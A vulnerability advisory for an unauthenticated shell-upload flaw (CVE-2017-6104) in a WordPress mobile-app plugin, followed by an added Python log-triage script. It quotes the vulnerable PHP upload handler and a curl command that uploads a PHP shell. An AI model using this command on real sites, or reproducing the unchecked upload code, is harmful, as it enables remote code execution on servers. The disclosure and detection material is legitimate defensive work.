packetstorm | Larry W. Cashdollar | PACKETSTORM:141384
History: Mar 02, 2017 - 12:00 a.m.

WordPress Mobile App Native 3.0 Shell Upload

2017-03-02 00:00:00
Larry W. Cashdollar
packetstormsecurity.com

EPSS: 0.003 (Low), percentile 69.6%

`Title: Remote file upload vulnerability in WordPress Plugin Mobile App Native 3.0  
Vulnerability Date: 2017-02-27  
Download: https://wordpress.org/plugins/zen-mobile-app-native/  
Vendor: https://profiles.wordpress.org/zendkmobileapp/  
Notified: 2017-02-27  
Vendor Contact:   
Description: Mobile App WordPress plugin lets you turn your website into a full-featured mobile application in minutes using Mobile App Builder.  
Vulnerability: The code in file ./zen-mobile-app-native/server/images.php doesn't require authentication or check that the user is allowed to upload content.  
It also doesn't sanitize the file upload against executable code.  
  
<?php  
//header('content-type: text/html; charset=iso-8859-2');  
header('Content-Type: text/html; charset=utf-8');  
header('Access-Control-Allow-Origin: *');  
require_once('function.php');  
  
// No authentication or capability check precedes the upload handling.  
if ($_FILES['file']['name']) {  
    if (!$_FILES['file']['error']) {  
        $name = md5(rand(100, 200));  
        // The extension is taken from the client-supplied filename, unvalidated.  
        $ext = explode('.', $_FILES['file']['name']);  
        $filename = $name . '.' . $ext[1];  
        // The file is written under the web-served plugin directory.  
        $destination = 'images/' . $filename;  
        $location = $_FILES["file"]["tmp_name"];  
        move_uploaded_file($location, $destination);  
        echo $plugin_url.'/server/images/' . $filename;  
    }  
    else {  
        echo $message = 'Ooops! Your upload triggered the following error: '.$_FILES['file']['error'];  
    }  
}  
CVEIDs: CVE-2017-6104  
Exploit:  
$ curl -F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native/server/images.php"  
http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native//server/images/8d5e957f297893487bd98fa830fa6413.php  
  
URL: http://www.vapidlabs.com/advisory.php?v=178  
Credit: Larry W. Cashdollar, @_larry0  
`
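
The advisory names both the upload endpoint and the directory where uploads are stored, which is enough to triage web server access logs for use of this flaw. The Python below is an added example, not part of the advisory or the plugin; the combined log format, the image-extension allowlist and the sample log lines are assumptions constructed for illustration.

```python
import re

PLUGIN = "/wp-content/plugins/zen-mobile-app-native/"
# Fields needed from a combined-format access log line (format is an assumption).
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# images.php stores each upload as <md5 hex>.<extension from the client's filename>.
STORED = re.compile(r"/server/images/[0-9a-f]{32}\.(\w+)$")
IMAGE_EXTS = {"jpg", "jpeg", "png", "gif"}  # assumption: what the site expects

def triage(lines):
    """Return (line_no, client, finding, path) for requests worth reviewing."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LINE.match(line)
        if not m:
            continue  # not a parseable access-log line
        client, method, target, status = m.groups()
        # Drop the query string and collapse "//" (the advisory's result URL has one).
        path = re.sub(r"/{2,}", "/", target.split("?", 1)[0])
        if PLUGIN not in path:
            continue
        if method == "POST" and path.endswith("/server/images.php"):
            findings.append((n, client, "unauthenticated-upload-endpoint", path))
            continue
        stored = STORED.search(path)
        if stored and stored.group(1).lower() not in IMAGE_EXTS and status == "200":
            findings.append((n, client, "non-image-served-from-upload-dir", path))
    return findings

# Constructed sample lines (documentation IP ranges, made-up file names).
SAMPLE_LOG = [
    '198.51.100.7 - - [02/Mar/2017:10:00:01 +0000] "POST /wordpress/wp-content/plugins/zen-mobile-app-native/server/images.php HTTP/1.1" 200 98 "-" "curl/7.50"',
    '198.51.100.7 - - [02/Mar/2017:10:00:05 +0000] "GET /wordpress/wp-content/plugins/zen-mobile-app-native//server/images/0123456789abcdef0123456789abcdef.php HTTP/1.1" 200 12 "-" "curl/7.50"',
    '192.0.2.10 - - [02/Mar/2017:10:01:00 +0000] "GET /wordpress/wp-content/plugins/zen-mobile-app-native/server/images/fedcba9876543210fedcba9876543210.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [02/Mar/2017:10:02:00 +0000] "GET /wordpress/index.php HTTP/1.1" 200 7400 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(*finding)
```

Any hit on the second finding type means a non-image file was served from the upload directory and the host should be treated as potentially compromised.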
